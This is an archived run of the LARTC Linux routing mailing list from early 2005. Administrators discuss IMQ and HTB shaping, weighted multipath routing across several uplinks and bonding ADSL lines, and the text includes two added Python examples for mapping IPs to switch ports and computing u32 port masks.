In-Reply-To: <41FE63EC.4090806@sch.bme.hu>
References: <41FD1304.1080305@sch.bme.hu> <41FE38D8.7070506@pobox.com> <41FE63EC.4090806@sch.bme.hu>
Message-ID: <41FE6689.1050402@pobox.com>

IMQ hooking is set on kernel config, there is an option for "IMQ behavior". Make sure you are using a recent patch version.

let me know if we can help you somehow...

Cheers.

Andre

Tóth Nándor wrote:
> Hi!
>
> Andre Correa wrote:
>
>>
>> Cool Toth, please let us know if you make it work. Just take care to
>> hook IMQ in the right place if you are doing NAT. You can choose to
>> hook it after or before NAT.
>
>
> Where can i set it?
> Can you answer my questions below?
>
> I will document these things, if i managed to do it.
>

From tatooin@kelkoo.com Mon Jan 31 17:25:52 2005
From: tatooin@kelkoo.com (Vincent Jaussaud)
Date: Mon, 31 Jan 2005 18:25:52 +0100
Subject: [LARTC] iproute-save ?
In-Reply-To: <20050128091239.102bec97@bugs>
References: <20050128091239.102bec97@bugs>
Message-ID: <1107192352.2846.340.camel@tatooin.kelkoo.net>

On Fri, 2005-01-28 at 09:12 +0200, raptor@tvskat.net wrote:
> Anyone to know iproute-save, iproute-restore like script similar iptables-save/restore ?
> that stores everything routes,rules,tables everything ...
> then init.d-script that among other things stores the state on shutdown :") (thats easy then)
>

I wrote something like that:
http://washington.kelkoo.net/iprvss/

I'm using it, to manage the policy routing setup of my company (around 25 firewalls / routers). I've been using it since several years with different scenarios, and so far without issues.

Let me know if you have problem with it. There is no init script at that time, unfortunately, but it should be quite easy to make one, or use rc.local to call it.

Regards,

>
> -----
> http://linuxtoday.com/news_story.php3?ltsn=2004-12-08-004-32-OS-BZ-DT-0005
> snip> MS Office is popular in the same way as heart disease is the most popular way to die.

--
Vincent Jaussaud
Kelkoo.com Security Manager
email: tatooin@kelkoo.com
GPG key: 1024D/3BFE3FC7 2002-02-07

"Those who desire to give up freedom in order to gain security will not have, nor do they deserve, either one." -- President Thomas Jefferson.
1743-1826

From Alf.Vahau@upng.ac.pg Mon Jan 31 18:14:34 2005
From: Alf.Vahau@upng.ac.pg (Alfred Vahau)
Date: Tue, 01 Feb 2005 04:14:34 +1000
Subject: [LARTC] Personal Firewalls
In-Reply-To: <41E2DBE0.7070403@routehat.org>
References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> <41E2DBE0.7070403@routehat.org>
Message-ID: <41FE758A.4050805@upng.ac.pg>

>However, there is a possibility if you want to find the computer by IP, if you use manageable switches. As you know which
>IPs are improper, you can also find the corresponding MAC address passively from the router's ARP table (or actively by
>arping), and the switches will be able to tell you on which port this MAC is plugged. Then you can e.g. shutdown the port or
>follow the cable to the physical computer location.

Just reporting back on how this went. The above worked beautifully and the suspect PC has been identified.
Two puzzling aspects which I hope the list will throw some light on are:

1. The ipconfig /all command on Windows returns the description of the NIC with company A but the MAC address contains the code for company B according to OUI scheme.
http://standards.ieee.org/regauth/oui/oui.txt
Is this an industry practice? Both IP and MAC addresses match that of the investigated computer.

2. Our proxy access logs show that sites C and D were heavily accessed. The browser history shows site D being accessed but not a trace of access to C. I am suspecting an ftp server being used.

Thanks in advance for the help.

alfred,

--
Perl - "... making the easy jobs easy, without making the hard jobs impossible."
'The Camel', 3ed

From rsenykoff@harrislogic.com Mon Jan 31 19:03:25 2005
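The lookup chain from the quoted advice above (IP to MAC from the router's ARP table, MAC to switch port), together with the OUI comparison from point 1, as an added Python example that is not part of the original post. Both tables are constructed samples using documentation addresses; the switch-table layout and the vendor map are assumptions standing in for your switch's own output and the IEEE oui.txt registry.

```python
import re
from typing import Dict, List, Optional

# Constructed sample in `ip neigh show` layout (RFC 5737 / RFC 7042 addresses).
ARP_TABLE = """\
192.0.2.10 dev eth1 lladdr 00:00:5e:00:53:0a REACHABLE
192.0.2.57 dev eth1 lladdr 00:00:5e:00:53:39 STALE
192.0.2.99 dev eth1 lladdr 02:00:5e:00:53:63 REACHABLE
192.0.2.120 dev eth1  FAILED
"""

# Constructed switch forwarding table: VLAN, MAC, type, port (layout is an assumption).
SWITCH_TABLE = """\
1  0000.5e00.530a  dynamic  Fa0/3
1  0000.5e00.5339  dynamic  Fa0/17
1  0200.5e00.5363  dynamic  Fa0/21
"""

# Constructed OUI -> vendor map; a real check would load the IEEE registry file.
OUI_VENDORS = {"00005e": "Company B (constructed)"}


def norm_mac(mac: str) -> str:
    """Reduce colon, dash or dotted notation to 12 lowercase hex digits."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError("not a MAC address: %r" % mac)
    return digits


def parse_arp(text: str) -> Dict[str, str]:
    """Map IP -> MAC; entries without lladdr (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        m = re.match(r"(\S+) dev \S+ lladdr (\S+)", line)
        if m:
            table[m.group(1)] = norm_mac(m.group(2))
    return table


def parse_switch(text: str) -> Dict[str, str]:
    """Map MAC -> switch port from the four-column table."""
    ports = {}
    for line in text.splitlines():
        cols = line.split()
        if len(cols) == 4:
            ports[norm_mac(cols[1])] = cols[3]
    return ports


def locate(ip: str, reported_vendor: Optional[str] = None,
           arp_text: str = ARP_TABLE, switch_text: str = SWITCH_TABLE) -> dict:
    """Resolve an IP to MAC and switch port, and note anything odd about the MAC."""
    mac = parse_arp(arp_text).get(ip)
    notes: List[str] = []
    if mac is None:
        return {"ip": ip, "mac": None, "port": None, "notes": ["no ARP entry"]}
    port = parse_switch(switch_text).get(mac)
    if port is None:
        notes.append("MAC not in switch table (aged out or behind another switch)")
    if int(mac[:2], 16) & 0x02:
        # U/L bit set: the address was assigned in software, so it carries no OUI.
        notes.append("locally administered address, no vendor OUI")
    else:
        oui_vendor = OUI_VENDORS.get(mac[:6], "unknown OUI")
        if reported_vendor and oui_vendor != reported_vendor:
            notes.append("NIC description says %s, OUI is registered to %s"
                         % (reported_vendor, oui_vendor))
    return {"ip": ip, "mac": mac, "port": port, "notes": notes}


if __name__ == "__main__":
    print(locate("192.0.2.57", reported_vendor="Company A (constructed)"))
    print(locate("192.0.2.99"))
    print(locate("192.0.2.120"))
```
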
From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com)
Date: Mon, 31 Jan 2005 13:03:25 -0600
Subject: [LARTC] load balancing between two default gateways
In-Reply-To: <20050131144818.2695e935.jesper@ballbreaker.dk>
Message-ID:

> Now what I want may be "shaping" to route 70% traffic via 2Mb and
> 30 via 1Mb.
> Is this possible via iproute2? if yes I will greatly appreciate if
> someone helps newbie to iproute2 :)

You can read the multipath routing section on lartc.org - Click on "Dive in" :)

I've been running load balancing between my cable modem and dsl. It works pretty well actually. Here's a link to the script I use:

http://www.burnpc.com/website.nsf/all/FE5F4F294F508EB786256E600019BC30

I also use the load balancer to do NAT between the subnet of the cable modem, subnet of DSL, and subnet my boxes are on. Also in there are some static route rules in case you always want to use a particular connection for certain traffic. In my case, my DSL modem is used for VPNs to work (Linksys BEFVP41) so I always send traffic for those IPs out through the appropriate NIC.

To try to achieve the 70 / 30 rule I recommend doing something like this to the line
ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1 weight 1 nexthop via $GWE2 dev $IFE2 weight 1

ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1 weight 7 nexthop via $GWE2 dev $IFE2 weight 3

I suggest reading up on the documentation to understand what those weight parameters really do. In essence they add 7 routes via one interface, and 3 via the other. Then the load balancer round-robins between them.

The easynews piece in there works in conjunction with Flashget. I set flashget's multiproxy up, and it will create multiple threads over the two ports. I'm able to download from easynews then at the total combined speed of the connections ==== fast!!!

Let me know if you have any questions,
-Ron

From gdamjan@mail.net.mk Mon Jan 31 22:23:09 2005
From: gdamjan@mail.net.mk (Damjan)
Date: Mon, 31 Jan 2005 23:23:09 +0100
Subject: [LARTC] How to bond pppoe links
Message-ID: <20050131222309.GA31550@legolas.on.net.mk>

I have three ADSL lines that I'd like to use as one big pipe to the internet. The ADSL service works by establishing a pppoe connection (the ADSL "modem" is a bridge), and each pppoe interface gets its own IP address.

This means I'd have to have 4 ethernet interfaces (3 for each of the ADSL modems and 1 for the LAN) in my gateway. I'd setup the gateway to NAT the LAN computers.

Now, I'm not completely sure how would this work, and what to expect. Any suggestions from someone that has done this (or similar scenario)?

--
damjan | дамјан
This is my jabber ID --> damjan@bagra.net.mk <-- not my mail address!!!

From mihaivlad@web-profile.net Mon Jan 31 22:27:44 2005
From: mihaivlad@web-profile.net (Mihai Vlad)
Date: Tue, 1 Feb 2005 00:27:44 +0200
Subject: [LARTC] Number of connections decreasing performance !
Message-ID:

Hello again,

I am stuck with this problem:

I have:
One Linux NAT Box.
One internet connection.
100 clients in the LAN.

Test 1:
- Connect only one client to the server and download from it a file.
-> The total speed recorded on the server is maximum (as expected - let's say 128KB)

Test 2:
- Connect all 100 clients (somewhere in the evening) and let them browse - download, etc
- Try to download the same file from the same client to make sure that the bandwidth is used at its maximum capacity
-> The total speed recorded on the server is half than before (around 64KB)

There is no load on the server (uptime shows 0.00 0.00 0.00)
I changed distributions and hardware to make sure...
I changed the computer to a P4 2GHz - 512 RAM
The same problem appears during high traffic hours.

Can u tell me if there is a limit in how many connection a Linux router might serve?
Can u spot another problem that might decrease the speed in such a way?

Please help... I am lost! I cannot see where the problem is...

Thanks in advance,
Mihai VLAD

From andy.furniss@dsl.pipex.com Mon Jan 31 23:17:14 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Mon, 31 Jan 2005 23:17:14 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <200501291829.44294.rio@martin.mu>
References: <200501191657.15767.rio@martin.mu> <200501281347.35551.rio@martin.mu> <41FADF0B.4030508@dsl.pipex.com> <200501291829.44294.rio@martin.mu>
Message-ID: <41FEBC7A.5030405@dsl.pipex.com>

Rio Martin. wrote:
> On Saturday 29 January 2005 00:55, Andy Furniss wrote:
>
>>>I ve tried this before, but never succeed. I didnt know where should i
>>>attach the 10:100 class. In the document, just told to add this class in
>>>tc, without giving some information which interface should i attach this
>>>class.
>>
>>I've not used squid, but think the idea is to shape on eth0 traffic from
>>inet to lan and miss traffic from squid to lan. The patch lets you
>>classify miss traffic from squid which you make an htb class for and you
>>can then involve it in sharing/prioritising etc with other inet to lan
>>traffic.
>>Andy.
>
>
>
> Thanks Andy for the info u gave,
> But the patch is totally missed with Squid-2.5.STABLE7, so i have to do it
> manually.
>
> I tried to placed this 10:100 class into eth0 (inet interface) and
> successfully do some shaping on outgoing request from squid to origin server
> where client request.
> It wont shape the incoming from origin server to squid.
> As u see, this is tcp_outgoing_priority, not tcp_incoming_priority.. :))
>
> so i still have to figure out more how to shape incoming packets to this squid
> proxy.

Ahh - I thought that squid could limit connections based on the rate the client could sustain.

You can shape incoming to squid with imq if hooked after nat, because its traffic will have real dst address - other will have been denatted.

If you want to further shape traffic to squid (eg by what local address requested or connected to/was directed to) then I can't think of a way.

Andy.

>
> - Rio.Martin -
>

From windtim@libero.it Mon Jan 31 23:24:23 2005
From: windtim@libero.it (windtim)
Date: Tue, 01 Feb 2005 00:24:23 +0100
Subject: [LARTC] MPLS QoS
Message-ID: <41FEBE27.4050507@libero.it>

Hi,
i'm testing QoS MPLS on IP network. I'm confused about what are features that permit Multi Protocol Label Switching to support QoS on a network. Can you clarify me it? In particular about the integration between MPLS and DiffServe

Thanks in advance for the help

From andy.furniss@dsl.pipex.com Mon Jan 31 23:39:12 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Mon, 31 Jan 2005 23:39:12 +0000
Subject: [LARTC] simple questions about imq
In-Reply-To: <41FD1304.1080305@sch.bme.hu>
References: <41FD1304.1080305@sch.bme.hu>
Message-ID: <41FEC1A0.9040909@dsl.pipex.com>

Tóth Nándor wrote:
> Hi!
>
> I have read all informations i could find, but some things are still not
> clear.
>
> My setup is:
> ---INTERNET1(eth0)-\    /- Local net1 (eth2)
>                     GW
> ---INTERNET2(eth1)-/    \- Local net2 (eth3)
>
> I have NAT and a working setup using HTB,SFQ, classifying with the
> iptables -j CLASSIFY way. I shape only the traffic coming from the
> internet heading to the intranet.
>
> I would like to have a configuration like this:
> ---INTERNET1(eth0)-\          /- Local net1 (eth2)
>                     GW--imq0
> ---INTERNET2(eth1)-/          \- Local net2 (eth3)
>
> I think it can be done this way:
> iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0
> iptables -t mangle -A PREROUTING -i eth1 -j IMQ --todev 0
>
> But it would include traffic heading to the gateway directly, wouldn't
> it?

Yes - but people often want this.

Can i put these rules to the POSTROUTING chain?
>
> And i can still have my CLASSIFY targets in the POSTROUTING chain,
> because IMQ queing will happen after it according to
> http://lartc.org/howto/lartc.imq.html.
> So for example:
> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY --set-class
> 1:30
> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY --set-class
> 1:30
> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN
> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN
>
> If i managed to do this, i promise, i will document it to the imq wiki.
>
> Any advice/help is appreciated!
>

You need to jump to imq in postrouting, classify should be done first ok try and see.

If you only want to shape forwarded traffic you could mark/classify using -i and -o in forward and then match on mark/class and -j IMQ in postrouting, it will only really matter if you have shaper to lan traffic you want to exclude from imq.

I don't see why you are classifying to the same class or need return. If you have two separate internet links you still need two nonsharing queues added to the imq device.

Andy.

From askar@askarali.info Tue Feb 1 04:45:25 2005
From: askar@askarali.info (Askar)
Date: Tue, 01 Feb 2005 09:45:25 +0500
Subject: [LARTC] load balancing between two default gateways
In-Reply-To:
References:
Message-ID: <41FF0965.8010803@askarali.info>

rsenykoff@harrislogic.com wrote:
>
>
>
>
>
>>Now what I want may be "shaping" to route 70% traffic via 2Mb and
>>30 via 1Mb.
>>Is this possible via iproute2? if yes I will greatly appreciate if
>>someone helps newbie to iproute2 :)
>>
>>
>
>You can read the multipath routing section on lartc.org - Click on
>"Dive in" :)
>
>
>I've been running load balancing between my cable modem and dsl. It works
>pretty well actually. Here's a link to the script I use:
>
>http://www.burnpc.com/website.nsf/all/FE5F4F294F508EB786256E600019BC30
>
>I also use the load balancer to do NAT between the subnet of the cable
>modem, subnet of DSL, and subnet my boxes are on. Also in there are some
>static route rules in case you always want to use a particular connection
>for certain traffic. In my case, my DSL modem is used for VPNs to work
>(Linksys BEFVP41) so I always send traffic for those IPs out through the
>appropriate NIC.
>
>To try to achieve the 70 / 30 rule I recommend doing something like this to
>the line
>ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1
>weight 1 nexthop via $GWE2 dev $IFE2 weight 1
>
>ip route add default table 222 proto static nexthop via $GWE1 dev $IFE1
>weight 7 nexthop via $GWE2 dev $IFE2 weight 3
>
>I suggest reading up on the documentation to understand what those weight
>parameters really do. In essence they add 7 routes via one interface, and 3
>via the other. Then the load balancer round-robins between them.
>
>The easynews piece in there works in conjunction with Flashget. I set
>flashget's multiproxy up, and it will create multiple threads over the two
>ports. I'm able to download from easynews then at the total combined speed
>of the connections ==== fast!!!
>
>Let me know if you have any questions,
>-Ron
>
>

Thanks for the quick reply, okay i will let you know after reading the docs section you suggested.

before going to deploy these ip rule on our production environment I have few questions.

we are also doing iproute2 + iptables MARKing on this machine to route port 80 traffic to our proxy/cache servers. Now the ip rules you suggested will not do anything with those already in place okay?

#ip rule show
32764: from all fwmark 0x4 lookup wwwPcache.out <--- we have three like this
.
.

Second to make the ip rule working I still need the convention "route" in place before doing ip rule things?
# route add default gw xxx.xxx.xxx.xx ?

regards
Askar

From rio@martin.mu Tue Feb 1 12:37:24 2005
From: rio@martin.mu (Rio Martin.)
Date: Tue, 1 Feb 2005 12:37:24 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <41FEBC7A.5030405@dsl.pipex.com>
References: <200501191657.15767.rio@martin.mu> <200501291829.44294.rio@martin.mu> <41FEBC7A.5030405@dsl.pipex.com>
Message-ID: <200502011237.24386.rio@martin.mu>

On Monday 31 January 2005 23:17, Andy Furniss wrote:
> Ahh - I thought that squid could limit connections based on the rate the
> client could sustain.
> You can shape incoming to squid with imq if hooked after nat, because
> its traffic will have real dst address - other will have been denatted.

Could you give me some example, how to do that?
Thanks ..

- Rio.Martin -

From nug@sch.bme.hu Tue Feb 1 05:44:17 2005
From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 01 Feb 2005 06:44:17 +0100 Subject: [LARTC] simple questions about imq In-Reply-To: <41FEC1A0.9040909@dsl.pipex.com> References: <41FD1304.1080305@sch.bme.hu> <41FEC1A0.9040909@dsl.pipex.com> Message-ID: <41FF1731.70201@sch.bme.hu> Hi! Andy Furniss wrote: > Can i put these rules to the POSTROUTING chain? > >> >> And i can still have my CLASSIFY targets in the POSTROUTING chain, >> because IMQ queing will happen after it according to >> http://lartc.org/howto/lartc.imq.html. >> So for example: >> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j CLASSIFY >> --set-class 1:30 >> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j CLASSIFY >> --set-class 1:30 >> $IPTABLES -t mangle -A POSTROUTING -o $eth2 ... -j RETURN >> $IPTABLES -t mangle -A POSTROUTING -o $eth3 ... -j RETURN >> >> If i managed to do this, i promise, i will document it to the imq wiki. >> >> Any advice/help is appreciated! >> > > You need to jump to imq in postrouting, classify should be done first ok > try and see. Ok will try it. > If you only want to shape forwarded traffic you could mark/classify > using -i and -o in forward and then match on mark/class and -j IMQ in > postrouting, it will only really matter if you have shaper to lan > traffic you want to exclude from imq. > > I don't see why you are classifying to the same class or need return. If > you have two seperate internet links you still need two nonsharing > queues added to the imq device. Yes, i have two non-sharing queues(*) now, too. I mark the packets in PREROUTING, so i can classify them to the appropiate queue in postrouting. The rules up there are just examples. I need RETURN, because i have overlapping rules, so packets would be classified twice (the second classify will be the valid, isn't it?). 
Like:
$IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --syn -m length --length 40:68 -j CLASSIFY --set-class 1:9
$IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --syn -m length --length 40:68 -j RETURN
$IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --dport 22 -j CLASSIFY --set-class 1:10
$IPTABLES -t mangle -A POSTROUTING -o $INTERNAL_INTERFACE -p tcp --dport 22 -j RETURN

Is this a stupid way to do this? I get this from the LARTC howto :) http://lartc.org/howto/lartc.cookbook.fullnat.intro.html "We have done a -j RETURN so packets don't traverse all rules"

Thanks, for the clarifying!
--
Udv, Nandor

* If anyone is curious:
HTB main 5000+120+250kbps
--- Child1 5000kbps for the DMZ
--- Child2 120kbps first internet line
--- Child3 250 kbps second internet line
From nug@sch.bme.hu Tue Feb 1 06:00:36 2005
From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 01 Feb 2005 07:00:36 +0100 Subject: [LARTC] multiple uplinks example script Message-ID: <41FF1B04.5020706@sch.bme.hu>
Hi!

I had two uplinks till today. We stopped one of them today, so i thought i could share my experience. (it is maybe useful for somebody) I hadn't managed to configure it using a LARTC howto, but the Nano-howto (http://www.ssi.bg/~ja/nano.txt) and julian's kernel patches.

I had some problems with icq connections, because it is a two step connection (It is just theory).
1. Client --> Main server
2. Main Server --> Client ; Main server -> small server
3. Client -> small server
The problem is, when connection 1. use different uplink than connection 2. Those icq related rules below corrected the problem.

My script:

IF0=eth2
IF1=eth1
IF2=eth3
IF3=eth0
P0_NET=192.168.1.0/24
P1_NET=public1
P2_NET=public2
IP0=192.168.1.254
IP1=publicip1
IP2=publicip1
#gateway
P1=publicgw1
P2=publicgw2
#table
T1=211
T2=212
T3=222
IP=/sbin/ip

# Delete everything
#$IP route flush cache
$IP route flush all
$IP route flush all table $T1
$IP route flush all table $T2
$IP route flush all table $T3
#icq rules
$IP rule delete prio 48 to 205.188.0.0/16 table $T1
$IP rule delete prio 49 to 64.12.161.153 table $T1
$IP rule delete prio 49 to 64.12.0.0/16 table $T1
$IP rule delete prio 50 table main
$IP rule delete prio $T3 table $T3
$IP rule delete prio $T1 from $P1_NET table $T1
$IP rule delete prio $T2 from $P2_NET table $T2

# The default table
$IP route add $P0_NET dev $IF0 src $IP0
$IP route add $P1_NET dev $IF1 src $IP1
$IP route add $P2_NET dev $IF2 src $IP2

# For stable icq connections
$IP rule add prio 48 to 205.188.0.0/16 table $T1
#$IP rule add prio 49 to 64.12.161.153 table $T1
$IP rule add prio 49 to 64.12.0.0/16 table $T1

$IP rule add prio 50 table main
$IP route del default table main

$IP rule add prio $T3 table $T3
$IP route add default table $T3 proto static \
nexthop via $P1 dev $IF1 weight 1 \
nexthop via $P2 dev $IF2 weight 3

$IP rule add prio $T1 from $P1_NET table $T1
$IP route add default via $P1 dev $IF1 src $IP1 proto static table $T1
$IP route append prohibit default table $T1 metric 1 proto static

$IP rule add prio $T2 from $P2_NET table $T2
$IP route add default via $P2 dev $IF2 src $IP2 proto static table $T2
$IP route append prohibit default table $T2 metric 1 proto static

$IP route flush cache

--
Udv, Nandor
From lartc@draxinusom.ch Tue Feb 1 08:11:48 2005
From: lartc@draxinusom.ch (Rene Gallati) Date: Tue, 01 Feb 2005 09:11:48 +0100 Subject: [LARTC] How to bond pppoe links In-Reply-To: <20050131222309.GA31550@legolas.on.net.mk> References: <20050131222309.GA31550@legolas.on.net.mk> Message-ID: <41FF39C4.2070603@draxinusom.ch>
Damjan wrote:
> I have three ADSL lines that I'd like to use as one big pipe to the
> internet. The ADSL service works by establishing a pppoe connection (the
> ADSL "modem" is a bridge), and each pppoe interface gets its own IP
> address.
> This means I'd have to have 4 ethernet interfaces (3 for each
> of the ADSL modems and 1 for the LAN) in my gateway. I'd setup the
> gateway to NAT the LAN computers.
>
> Now, I'm not completely sure how would this work, and what to expect.
> Any suggestions from someone that has done this (or similar scenario)?

Yes it is possible, though it may make only sense iff you have several clients behind the gateway (since for example http is a stateless protocol where most often every single picture and page is fetched using another tcp connection and if you balance it always, you are constantly switching the source ip which breaks ssl and session tracking. Generally you always use the same link for the same destination, which means less balancing, so you need more clients to even it out again)

But for help, I have found the nano-howto extremely useful. http://www.ssi.bg/~ja/nano.txt

--
C U

- -- ---- ----- -----/\/ René Gallati \/\---- ----- --- -- -
From lartc@diab.org Tue Feb 1 12:49:50 2005
From: lartc@diab.org (diab) Date: Tue, 1 Feb 2005 13:49:50 +0100 Subject: [LARTC] How to bond pppoe links In-Reply-To: <20050131222309.GA31550@legolas.on.net.mk> References: <20050131222309.GA31550@legolas.on.net.mk> Message-ID: <1003313677.20050201134950@diab.org> D> I have three ADSL lines that I'd like to use as one big pipe to the D> internet. The ADSL service works by establishing a pppoe connection (the D> ADSL "modem" is a bridge), and each pppoe interface gets its own IP D> address. D> This means I'd have to have 4 ethernet interfaces (3 for each D> of the ADSL modems and 1 for the LAN) in my gateway. I'd setup the D> gateway to NAT the LAN computers. It's only possible to "bond" the interfaces correctly (meaning that eg. one ftp download could reach almost the sum speed of all ADSL interfaces) if you have an other computer on the other end that "splits" the packages for you. I've managed to do it but keep in mind that it's only worth it if you have a colocation facility near by where you do not pay after the traffic. It looks like this: lan - gw ====== coloc - internet between the GW (your gateway) and the coloc (the computer you have total control over at a colocation facility) there are any arbitrary number of transports (eg. ADSL lines). the trick is to create one VPN connection over one ADSL line (I am using vtund, ether tunnel over TCP because UDP didnt work for some reason) and bond the tunXX intefaces together on both sides using ifenslave. after this the default route should be set to bond0 and if ip forwarding is enabled on the coloc machine it all miraculously works. vtund should be running as a server on the colocation machine and each client instance on the lan gw should connect using a different ADSL interface. 
if can be achieved by running pppd with "nodefaultroute" and with the combination of iptables MARK / ip rule / ip route different instances (connecting to different ports on the coloc machine) of vtund client connections will be routed on the correct interface using packet classification and static routes. we've been running an internet cafe on 2x1,5mbit ADSL here in Hungary reliably on this link adding only 2-3ms delay (because of the additional routing / extra computers) and having at least 90% bandwidth of the 3mbit. the colocation computer is also set up at the isp where we're getting the adsl from, so it's relatively "near" in terms of latency. it worked rather shitty (if at all) when one of the lines was 512 and the other one was 1500. i've also heard of isp's in England who support ethernet bonding so you may just order a bunch of adsl lines and bond them together on your end. there might be some in your area as well :) (definitely not here in Hungary though) -- diab From lartc@mailman.ds9a.nl Tue Feb 1 14:42:56 2005 
From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 15:42:56 +0100 Subject: [LARTC] multiple defaults Message-ID: <20050201154256.100e586c.mailinglists@lucassen.org>
I have 1 100MB NIC with two 2MB-subnets through a router behind it. I'd like to create multiple default classes:

1:
+
|\_ 1:10 default, ceiling 100000kbit, rate 96000kbit
|
|\_ 1:11 ceiling 2048kbit, rate 2048kbit
|  |
|  |\_1:110 ceiling 2048kbit, rate 1536kbit
|  \_1:111 ceiling 2048kbit, rate 512kbit (default subnet1)
|
\_ 1:12 ceiling 2048kbit, rate 2048kbit
   |
   |\_1:120 ceiling 2048kbit, rate 1536kbit
   \_1:121 ceiling 2048kbit, rate 512kbit (default subnet2)

I want to use 1:110 for subnet1 sport 3389
I want to use 1:111 for subnet1 (the rest)
I want to use 1:120 for subnet2 sport 3389
I want to use 1:121 for subnet2 (the rest)

When selecting

u32 match ip dst 10.106.18.0/24 \
match ip protocol 6 0xff \
match ip sport 3389 0xffff \
flowid 1:120

u32 match ip dst 10.106.18.0/24 \
flowid 1:121

All traffic goes to 1:121. The first filter for port 3389 is ok and works.

What am I doing wrong? I'd rather not use fw selectors. Or should I solve this problem another way?

Richard.

--
___________________________________________________________________
Recursion: see recursion

+------------------------------------------------------------------+
| Richard Lucassen, Utrecht |
| Public key and email address: |
| http://www.lucassen.org/mail-pubkey.html |
+------------------------------------------------------------------+
From lartc@mailman.ds9a.nl Tue Feb 1 14:49:02 2005
From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 15:49:02 +0100 Subject: [LARTC] combining fw and u32 Message-ID: <20050201154902.047e4b23.mailinglists@lucassen.org> Is it possible to create 1 filter rule using fw selectors AND u32 selectors? Richard. -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From util@deuroconsult.ro Tue Feb 1 14:58:46 2005 
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Tue, 1 Feb 2005 16:58:46 +0200 (EET) Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201154902.047e4b23.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> Message-ID:
On Tue, 1 Feb 2005, richard lucassen wrote:
> Is it possible to create 1 filter rule using fw selectors AND u32
> selectors?
>
> Richard.

http://kernel.umbrella.ro if you don't have 2.6.11-rc1.
If you have the latest iproute2 you can do:

# send a packet with mark 3 and tcp with dport >= 1024 to 1:50
tc filter add dev dummy0 \
protocol ip \
parent 1: prio 13 \
u32 \
match mark 0x0003 0xffff \
match ip dport 0x0400 0x0400 \
flowid 1:50

See this link for more examples:
http://kernel.umbrella.ro/net/mark_in_u32/examples.txt

> --
> ___________________________________________________________________
> Recursion: see recursion
>
> +------------------------------------------------------------------+
> | Richard Lucassen, Utrecht |
> | Public key and email address: |
> | http://www.lucassen.org/mail-pubkey.html |
> +------------------------------------------------------------------+

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/
From lartc@mailman.ds9a.nl Tue Feb 1 15:11:51 2005
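u32 compares (field & mask) with the value, so one value/mask pair selects ports by bit pattern rather than by numeric range. The following is an added example, not part of any message in this archive and not iproute2 code: it evaluates the 0x0400 0x0400 pair used in the command above and derives the value/mask pairs that cover a port range exactly. The helper names are hypothetical.

```python
# Added example: how a u32 "match ip dport VALUE MASK" pair selects ports,
# and which pairs cover a numeric port range exactly.
# Helper names are hypothetical; nothing here calls tc.

def u32_match(port, value, mask):
    """u32 semantics for one 16-bit key: (port & mask) == (value & mask)."""
    return (port & mask) == (value & mask)


def ports_matched(value, mask):
    """All 16-bit ports selected by a single value/mask pair."""
    return [p for p in range(0x10000) if u32_match(p, value, mask)]


def range_to_pairs(lo, hi):
    """Split the inclusive port range lo..hi into aligned power-of-two
    blocks, each expressible as one (value, mask) pair."""
    if not 0 <= lo <= hi <= 0xFFFF:
        raise ValueError("need 0 <= lo <= hi <= 65535")
    pairs = []
    while lo <= hi:
        size = lo & -lo if lo else 0x10000      # largest block aligned at lo
        while size > hi - lo + 1:               # shrink until it fits
            size >>= 1
        pairs.append((lo, 0xFFFF & ~(size - 1)))
        lo += size
    return pairs


def as_tc_matches(pairs):
    """Render each pair in the 'match ip dport' form used in the thread.
    Matches inside one filter are ANDed, so each pair needs its own filter."""
    return ["match ip dport 0x%04x 0x%04x" % pair for pair in pairs]


if __name__ == "__main__":
    hit = ports_matched(0x0400, 0x0400)
    print("0x0400/0x0400 selects", len(hit), "ports; 2048 matched:", 2048 in hit)
    for line in as_tc_matches(range_to_pairs(1024, 65535)):
        print(line)
```

Each rendered match line would go into its own filter with the same flowid, since a single u32 filter requires all of its matches to hold.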
